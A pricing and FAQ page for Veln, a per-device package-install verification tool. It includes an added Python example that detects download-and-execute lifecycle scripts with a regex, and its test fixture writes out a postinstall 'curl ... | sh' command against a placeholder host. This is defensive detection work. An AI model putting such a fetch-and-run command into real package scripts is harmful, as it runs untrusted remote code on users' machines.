Pricing

$9.99 per device. Forever.

One price, paid once. Full package verification across every package manager, on every machine — a lifetime license tied to the device. Add a machine, buy another device license.

Per developer machine

Veln

$9.99

per device · one-time · USD

Full supply-chain protection across every package manager, on every developer machine. One lifetime license per machine — no subscription, no renewals.

More machines? Buy another device license anytime — each one is a one-time $9.99 purchase you activate on the next machine. Buy one or several at once.

Every device license includes

  • npm, yarn, pnpm, bun — every install intercepted
  • pip, pip3, uv, pipx — every install intercepted
  • go, cargo, bundle, dotnet, mvn, gradle — install-time gate routing
  • OS-level install-script isolation (Linux Landlock, macOS sandbox-exec, Windows Job Object — see capabilities for the Windows network-isolation caveat)
  • OSV vulnerability lookups + npm publish-attestation checks
  • Maintainer-drift, dormant-revival, license-change, and dependency-confusion signals
  • Obfuscation, dynamic-eval, and packed-payload detection
  • Capability / permission-creep + telemetry, secret-exfil, and geo-targeting signals
  • SBOM export (CycloneDX & SPDX), policy-as-code rules, and VEX suppressions
  • Local Console with full per-package finding history

FAQ

Frequently asked questions

How does pricing work?

You pay $9.99 once per device — a lifetime license, no subscription. Ten machines is ten device licenses, $99.90 one time. There are no renewals and nothing to cancel.

What counts as a device?

One license covers one machine. If a developer uses two machines (a laptop and a desktop), that's two device licenses. Once a license is activated on a machine it is tied to that machine for life.

Can I buy more devices later?

Yes. Buy device licenses whenever you add machines — each new purchase grants another lifetime license you can activate on the next device. Buy one at a time or several at once.

Is it really lifetime?

Yes. Activation binds the license to that device permanently and the agent verifies it offline from then on — there are no reactivations, no expiry, and no recurring license checks. A license stays with the device it was activated on.

Does Veln send my code anywhere?

Veln does not transmit your source code, your project files, or your dependency list to the Veln backend. Verdicts are computed locally on your machine. After a one-time device activation the agent verifies your license offline — there is no recurring license call. Vulnerability and provenance lookups go to third parties (OSV / api.osv.dev for known CVEs, the npm registry for publish attestations) and contain only the (name, version) pair your package manager was about to install anyway.

Does it slow down my installs?

For packages already in the local fingerprint cache, the gate adds tens of milliseconds — typically under 50 ms per package on a warm cache. The first time a new (package, version) is seen, the gate downloads its tarball, hashes it, and runs the full signal pipeline; that takes the time the registry plus OSV plus your network would have taken anyway. After that first verification, subsequent installs hit the local cache.

What does Veln actually block?

Veln blocks packages whose combined trust score falls below the policy's block threshold. The score combines 20+ signals: known OSV vulnerabilities, registry/tarball repo-URL mismatch, dormant-revival, maintainer drift, license change, dependency-confusion, typosquat, install-script risk (download+execute, time-bombs, unicode tricks), obfuscation, dynamic eval, packed-payload binaries, file-tree drift versus a previously observed version, and cooling-window violations. A local threat-feed denylist (opt-in via `VELN_THREAT_DENYLIST_PATH`) is also wired in if you point it at a list you maintain. When something blocks, Veln names the exact signal code and detail (e.g. `static.npm_dep_lifecycle_script_critical: curl|sh in postinstall`).
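As an added illustration of the verdict shape described above (example code, not Veln's own and not its scoring): a small gate that scans `package.json` lifecycle scripts for download-and-execute patterns, consults an optional local denylist, and reports a signal code plus detail alongside a score-versus-threshold decision. The threshold, penalty weights, the `feed.denylist_match` code, and the one-name-per-line denylist format are assumptions.

```python
import json
import os
import re

# Assumed policy values: Veln's real threshold and weights are not stated on the page.
BLOCK_THRESHOLD = 50
PENALTIES = {"static.npm_dep_lifecycle_script_critical": 80, "feed.denylist_match": 100}

# Download-and-execute shape in a lifecycle script: a fetch piped straight into a shell.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash)\b")
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Constructed sample inputs (not real packages).
BAD_PACKAGE_JSON = json.dumps({"name": "evil-pkg", "version": "1.0.0",
    "scripts": {"postinstall": "curl -s https://example.invalid/x.sh | sh"}})
GOOD_PACKAGE_JSON = json.dumps({"name": "good-pkg", "version": "2.1.0",
    "scripts": {"postinstall": "node scripts/build.js"}})


def lifecycle_script_signals(package_json: str):
    """Return (signal_code, detail) pairs for risky lifecycle scripts."""
    scripts = json.loads(package_json).get("scripts", {})
    found = []
    for hook in LIFECYCLE_HOOKS:
        m = DOWNLOAD_EXEC.search(scripts.get(hook, ""))
        if m:
            found.append(("static.npm_dep_lifecycle_script_critical",
                          f"{m.group(1)}|{m.group(2)} in {hook}"))
    return found


def denylist_signals(name: str, denylist_path=None):
    """Opt-in local denylist (assumed format: one package name per line, '#' comments)."""
    path = denylist_path or os.environ.get("VELN_THREAT_DENYLIST_PATH")
    if not path or not os.path.exists(path):
        return []
    with open(path, encoding="utf-8") as fh:
        names = {ln.strip() for ln in fh if ln.strip() and not ln.startswith("#")}
    return [("feed.denylist_match", f"{name} listed in {path}")] if name in names else []


def gate(name: str, package_json: str, denylist_path=None):
    """Start at a trust score of 100, subtract per-signal penalties, block below threshold."""
    signals = lifecycle_script_signals(package_json) + denylist_signals(name, denylist_path)
    score = max(0, 100 - sum(PENALTIES[code] for code, _ in signals))
    verdict = "block" if score < BLOCK_THRESHOLD else "allow"
    return {"package": name, "score": score, "verdict": verdict, "signals": signals}


if __name__ == "__main__":
    for pkg, meta in (("evil-pkg", BAD_PACKAGE_JSON), ("good-pkg", GOOD_PACKAGE_JSON)):
        print(gate(pkg, meta))
```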

What happens if Veln crashes mid-install?

If Veln's process dies, the byte stream to your package manager dies with it. The package manager sees a connection error and aborts. No partial package lands on disk.